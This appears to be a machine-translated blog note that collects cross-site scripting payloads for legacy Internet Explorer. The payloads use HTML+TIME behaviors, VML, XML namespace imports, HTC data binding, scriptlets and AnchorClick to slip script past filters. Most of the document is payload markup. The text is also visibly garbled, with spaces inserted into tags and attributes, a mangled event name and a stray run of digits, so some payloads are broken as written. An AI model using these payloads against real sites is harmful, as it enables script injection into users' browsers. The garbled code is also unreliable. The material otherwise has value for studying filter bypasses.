Use html xml, VML, and TIME to execute XSS

Some of the information we can see from html5sec.org is IE only. Here, I will take notes and my experiences. 1. time attributename and values

<Html xmlns: t = "urn: schemas-microsoft-com: time">
<Body>
<Div title = "alert (1);" id = "myxss"> xxx </div>
<Div>
<T: animate style = "behavior: url (# default # time2)" attributename = "innerhtml"

Values = "& lt; img/src = & quot ;. & quot; style = & quot; display: none & quot; onerror = eval (myxss. title) & gt; "> </t: animate>
</Div>
</Body>
</Html> directly use the following elements:

Prevents invisible single-line code

<Animate/xmlns = urn: schemas-microsoft-com: time style = behavior: url (# default # time2) attributename = innerhtml values = & lt; img/src = & quot ;. & quot; onerror = alert (1) & gt;>

Prevent single-line code from seeing 2. time onbegin. What's better is that as long as there is an onxxx filter, it will be useless.

<X style = 'behavior: url (# default # time2) 'onin in = 'write (1) '> 3. time set attributename

<Html xmlns: t = "urn: schemas-microsoft-com: time">
<Body>
<Div title = "alert (1);" id = "myxss"> xxx </div>
<Div>
<Set/xmlns = 'urn: schemas-microsoft-com: time' style = 'beh & # x41; vior: url (# default # time2) 'attributename = 'innerhtml'

To = '& lt; img/src = & quot; x & quot; onerror = alert (1) & gt;'>
</Div>
</Body>
</Html> 4. vml onmouseover trigger

<Html xmlns: t = "urn: schemas-microsoft-com: time">
<Body>
<Div title = "alert (1);" id = "myxss"> xxx </div>
<Div>
1 <vmlframe xmlns = urn: schemas-microsoft-com: vml style = behavior: url (# default # vml); position: absolute; width: 100%; height: 100%

Src = test. vml # xss> </vmlframe>
</Div>
</Body>
</Html> test. vml

<Xml>
<Rect style = "height: 100%; width: 100%" id = "xss" onmouseover = "alert (1) "strokecolor =" white "strokeweight =" 2000px "filled =" false "/>
</Xml> 5. Alternative time, html/xml + import combination

<Html>
<Body>
<Div>
<Div id = "x"> x </div>
<? Xml: namespace prefix = "t">
<? Import namespace = "t" implementation = "# default # time2">
<T: set attributeName = "innerHTML" targetElement = "x" to = "& lt; img & #11; src = x: x & #11; onerror & #11; = alert (1) & gt; ">
</Div>
</Body>
</Html> xml, import? Yes.

? 01020304050607080910

Or html + import combination

<Html xmlns: t>
<Body>
<Div>
<Div id = "x"> x </div>
<? Import namespace = "t" implementation = "# default # time2">
<T: set attributeName = "innerHTML" targetElement = "x" to = "& lt; img & #11; src = x: x & #11; onerror & #11; = alert (1) & gt; ">
</Div>
</Body>
</Html> 6. xml + htc combination

<Html>
<Body>
<Div>
<Xml id = "xss" src = "test. htc"> </xml>
<Label dataformatas = "html" datasrc = "# xss" dataworkflow = "payload"> </label>
</Div>
</Body>
</Html> test. htc File

<? Xml version = "1.0"?>
<X>
<Payload> <! [CDATA []> </payload>
</X> 7. style + scriptlet combination

Test. sct code

<SCRIPTLET>
<IMPLEMENTS Type = "Behavior"> </IMPLEMENTS>
<SCRIPT Language = "javascript"> alert (1) </SCRIPT>
</SCRIPTLET> 8. AnchorClick + folder (click the link to execute)

Prevents invisible single-line code

<A style = "behavior: url (# default # AnchorClick);" folder = "javascript: alert (1)"> XXX </a>

Prevent single-line code from being invisible. Summary: behavior is dangerous !! Import is also dangerous in the style, as the mark <import...> or <? Import...> It's still dangerous ~